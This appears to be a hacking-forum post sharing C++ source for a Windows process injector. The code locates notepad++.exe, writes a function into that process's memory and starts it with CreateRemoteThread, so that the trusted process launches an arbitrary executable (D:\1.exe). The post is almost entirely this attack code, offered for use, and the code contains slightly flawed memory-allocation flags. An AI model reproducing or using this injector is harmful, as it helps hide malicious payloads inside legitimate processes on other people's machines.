Expermicid Posted September 2, 2012 Share Posted September 2, 2012 (edited) [lenguaje=delphi]//****************************************************************************** //* AUTOR: Fakedo0r .:PD-TEAM:. //* FECHA: 01.09.2012 //* CORREO: [email protected] //* BLOG: Sub-Soul.blogspot.com / Sub-Soul.com //* USO: Injector; //****************************************************************************** //****************************************************************************** //#INCLUDE //****************************************************************************** #include //****************************************************************************** //DECLARACION DE FUNCIONES / PROCEDIMIENTOS //****************************************************************************** LPVOID AllocAndCopyMem(HANDLE hProcess, const LPVOID lpBuffer, SIZE_T iBufferSize); typedef HINSTANCE(WINAPI *__ShellExecute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, int); //****************************************************************************** //DECLARACION DE ESTRUCTURAS //****************************************************************************** struct T_INJECT { __ShellExecute __ShlExe; wchar_t cExe[MAX_PATH]; wchar_t cOper[MAX_PATH]; }; //****************************************************************************** //<--- LA FUNCION QUE VAMOS A INYECTAR ---> //****************************************************************************** void Injected(T_INJECT *tInj) { tInj->__ShlExe(0, tInj->cOper, tInj->cExe, NULL, NULL, 1); } //****************************************************************************** //<--- LA FUNCION QUE OPERA LA INYECCION ---> //****************************************************************************** void Injector() { DWORD dwPID = 0; DWORD dwExitCode = 0; UINT uTamFun = 0; HANDLE hProcess; HANDLE hThread; HMODULE hModule; PROCESSENTRY32 tProcEntry; T_INJECT tInj; hProcess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); tProcEntry.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hProcess, &tProcEntry)) { do { if (String(tProcEntry.szExeFile) == "notepad++.exe") { dwPID = tProcEntry.th32ProcessID; break; } } while (Process32Next(hProcess, &tProcEntry)); } CloseHandle(hProcess); // obtenemos el handle del proceso hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, dwPID); // obtenemos el puntero del api hModule = LoadLibrary(UnicodeString("Shell32.dll").w_str()); tInj.__ShlExe = (__ShellExecute)(DWORD) GetProcAddress(hModule, "ShellExecuteW"); // copiamos los datos en las variables lstrcpy(tInj.cExe, L"D:\\1.exe"); lstrcpy(tInj.cOper, L"open"); // reservamos y copiamos nuestra estructura en la memoria LPVOID lpStruct = AllocAndCopyMem(hProcess, &tInj, sizeof(T_INJECT)); // calculamos el tamaño de nuestra funcion uTamFun = (UINT)Injector - (UINT)Injected; // reservamos y copiamos nuestra funcion en la memoria LPVOID lpEsp = AllocAndCopyMem(hProcess, &Injected, uTamFun); // creamos el hilo remoto hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpEsp, lpStruct, 0, NULL); if (hThread != 0) { // esperamos hasta que se cree el hilo WaitForSingleObject(hThread, INFINITE); // obtenemos el estado de terminacion del hilo GetExitCodeThread(hThread, &dwExitCode); // liberamos el handle del hilo creado CloseHandle(hThread); // liberamos el espacio en el proceso VirtualFreeEx(hProcess, lpStruct, 0, MEM_RELEASE); VirtualFreeEx(hProcess, lpEsp, 0, MEM_RELEASE); } // liberamos el handle del proceso CloseHandle(hProcess); } //****************************************************************************** //<--- RESERVA ESPACIO Y ESCRIBE EN LA MEMORIA ---> //****************************************************************************** LPVOID AllocAndCopyMem(HANDLE hProcess, LPVOID lpBuffer, SIZE_T iBufferSize) { // reservamos espacio en la memoria LPVOID lpRemAlloc = VirtualAllocEx(hProcess, 0, iBufferSize, MEM_COMMIT | PAGE_READWRITE, PAGE_EXECUTE_READWRITE); // escribimos en la memoria WriteProcessMemory(hProcess, lpRemAlloc, lpBuffer, iBufferSize, NULL); return lpRemAlloc; } [/lenguaje] Edited February 16, 2014 by Expermicid Link to comment Share on other sites More sharing options...
Recommended Posts